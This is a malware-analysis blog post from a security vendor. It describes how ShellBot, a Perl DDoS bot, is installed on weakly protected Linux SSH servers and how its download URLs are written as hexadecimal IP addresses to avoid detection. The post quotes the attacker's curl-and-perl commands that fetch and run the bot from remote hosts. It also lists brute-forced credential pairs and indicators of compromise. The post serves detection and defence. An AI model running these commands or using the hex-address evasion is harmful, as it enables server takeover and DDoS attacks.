AhnLab Security Emergency response Center (ASEC) has recently discovered a change in the distribution method of the ShellBot malware, which is being installed on poorly managed Linux SSH servers. The overall flow remains the same, but the download URL used by the threat actor to install ShellBot has changed from a regular IP address to a hexadecimal value.
- hxxp://0x2763da4e/dred
- hxxp://0x74cc54bd/static/home/dred/dred
1. Past Case of URL Detection Evasion
Typically, IP addresses are used in the “dot-decimal notation” format, with threat actors using addresses such as “hxxp://94.250.254[.]43/” for their C&C, download, and phishing URLs. However, IP addresses can be expressed in formats other than the “dot-decimal notation”, including decimal and hexadecimal notations, and are generally compatible with widely used web browsers.
Due to this, threat actors have employed diverse URL techniques to circumvent URL detection, and there was a previous instance of a decimal address being utilized to create a phishing PDF malware. The phishing PDF malware contained the URL “hxxp://1593507371” which, in “dot-decimal notation”, translates to “hxxp://94.250.254[.]43/”.
Figure 1. Malicious URL contained in the phishing PDF malwareClicking on the URL in the phishing PDF causes the web browser to connect to the address “hxxp://1593507371”, which leads to the same result as connecting to the address “hxxp://94.250.254[.]43/”. The threat actor used this decimal IP address notation as their URL to evade malicious URL detection, and when accessed, users were redirected to various phishing sites.
Figure 2. Addresses that users were redirected to when the link in a past PDF was clicked
2. Past Attack Cases of ShellBot
After scanning systems that have operational port 22s, threat actors search for systems where the SSH service is active and use a list of commonly used SSH account credentials to initiate their dictionary attack. If they manage to successfully log in, they are able to install a variety of malware.
ShellBot, also known as PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with a C&C server. ShellBot is an old malware that has been in steady use and is still being used today to launch attacks against Linux systems. ASEC has covered ShellBot attack cases in a past blog post [1] and is continuously detecting and responding to attack sources, downloads, and C&C addresses.
Among the ShellBot malware variants still in circulation, there is a type known as “DDoS PBot v2.0”, and a distinctive feature of the specific threat actor who has been using this variant in their attacks is their consistent use of the name “dred” during malware installation.
Figure 3. Initial routine of DDoS PBot v2.0| Filename | Installation Command | C&C URL | IRC Channel |
|---|---|---|---|
| dred | uname -a;lspci | grep -i –color ‘vga|3d|2d’;curl -s -L hxxp://39.107.61[.]230/dred -o /tmp/dred;perl /tmp/dred | 192.3.141[.]163:6667 | #new |
| dred | uname -a;lspci | grep -i –color ‘vga|3d|2d’;curl -s -L hxxp://39.165.53[.]17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred | 192.3.141[.]163:6667 | #bigfalus |
| Command (Category) | Description |
|---|---|
| system | Outputs information of infected system |
| version | Outputs version information |
| channel | IRC control commands |
| flood | DDoS commands TCP, UDP, HTTP, SQL Flooding, etc. |
| utils | Attack commands Port Scan, Reverse Shell, file download, etc. |
3. Latest Attack Cases of ShellBot
In September 2023, it was confirmed that the same threat actor was installing ShellBot using hexadecimal IP addresses instead of their usual “dot-decimal notation” format IP addresses. The following is a section of a list containing the attack source addresses that conducted these attacks, along with the corresponding IDs and passwords that were utilized.
| ID | Password | Attack Source Address |
|---|---|---|
| admin | admin | 61.242.178[.]220 |
| root | !Q2w3e4r | 135.125.240[.]201 |
| cloud | cloud | 124.222.211[.]66 |
| root | root123 | 31.145.142[.]206 |
| postgres | postgres | 175.178.157[.]198 |
| root | Passw0rd | 123.6.5[.]229 |
After successfully logging in, the threat actor used the following commands to install ShellBot. In comparison to previous cases, the commands themselves remain the same; the only difference is the use of hexadecimal values for the IP address.
| Filename | Installation Command | C&C URL | IRC Channel Name |
|---|---|---|---|
| dred | uname -a;lspci | grep -i –color ‘vga\|3d\|2d’;curl -s -L hxxp://0x2763da4e/dred -o /tmp/dred;perl /tmp/dred | 192.3.141[.]163:6667 | #news |
| dred | uname -a;lspci | grep -i –color ‘vga\|3d\|2d’;curl -s -L hxxp://0x74cc54bd/static/home/dred/dred -o /tmp/dred;perl /tmp/dred | N/A | N/A |
Figure 4. Configuration data of DDoS PBot v2.0The address represented in hexadecimal as “0x2763da4e” corresponds to “39.99.218[.]78”, and “0x74cc54bd” corresponds to “116.204.84[.]189”. Due to the usage of curl for the download and its ability to support hexadecimal just like web browsers, ShellBot can be downloaded successfully on a Linux system environment and executed through Perl.
Figure 5. Showing that curl supports hexadecimal IP addresses
4. Conclusion
The ShellBot malware is being installed on poorly managed Linux SSH servers, with recent cases confirming its use of hexadecimal IP addresses to evade behavior-based detection. If ShellBot is installed, Linux servers can be used as DDoS Bots for DDoS attacks against specific targets after receiving a command from the threat actor. Moreover, the threat actor could use various other backdoor features to install additional malware or launch different types of attacks from the compromised server.
Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks, and update to the latest patch to prevent vulnerability attacks. They should also use security programs such as firewalls for servers accessible from external sources to restrict access by threat actors. Finally, caution must be practiced by updating V3 to the latest version to block malware infection in advance.
ASEC uses Linux SSH honeypots to collect these attack source addresses in real-time, and the confirmed attack source addresses are provided through AhnLab TIP.
Figure 6. Thread IOC page of AhnLab TIPFile Detection
– Shellbot/Perl.Generic.S1100 (2020.02.12.00)
IOC
MD5
– 8853bb0aef4a3dfe69b7393ac19ddf7f: ShellBot – past
– 7bc4c22b0f34ef28b69d83a23a6c88c5: ShellBot – past
– a92559ddace1f9fa159232c1d72096b2: ShellBot – recent
Download URLs
– hxxp://39.107.61[.]230/dred: ShellBot (past)
– hxxp://39.165.53[.]17:8088/iposzz/dred: ShellBot (past)
– hxxp://39.99.218[.]78/dred: ShellBot – 0x2763da4e (recent)
– hxxp://116.204.84[.]189/static/home/dred/dred: ShellBot – 0x74cc54bd (recent)
C&C URL
– 192.3.141[.]163:6667: ShellBot
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses appeared first on ASEC BLOG.
Article Link: https://asec.ahnlab.com/en/57635/